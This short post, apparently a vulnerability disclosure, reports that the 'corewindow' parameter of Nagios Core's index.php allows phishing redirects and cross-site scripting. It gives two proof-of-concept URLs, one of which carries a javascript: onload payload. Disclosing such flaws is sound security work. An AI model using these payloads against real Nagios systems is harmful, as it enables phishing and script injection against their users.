Posted by randomsec guy on Jun 13

corewindow can be used to phish users:
http://jdoe:jdoe () nagioscore demos nagios com/nagios/index.php?corewindow=http://wikipedia.com

also to perform xss:
http://jdoe:jdoe () nagioscore demos nagios
com/nagios/index.php?corewindow=javascript://zz%250a;onload=alert(document.domain)//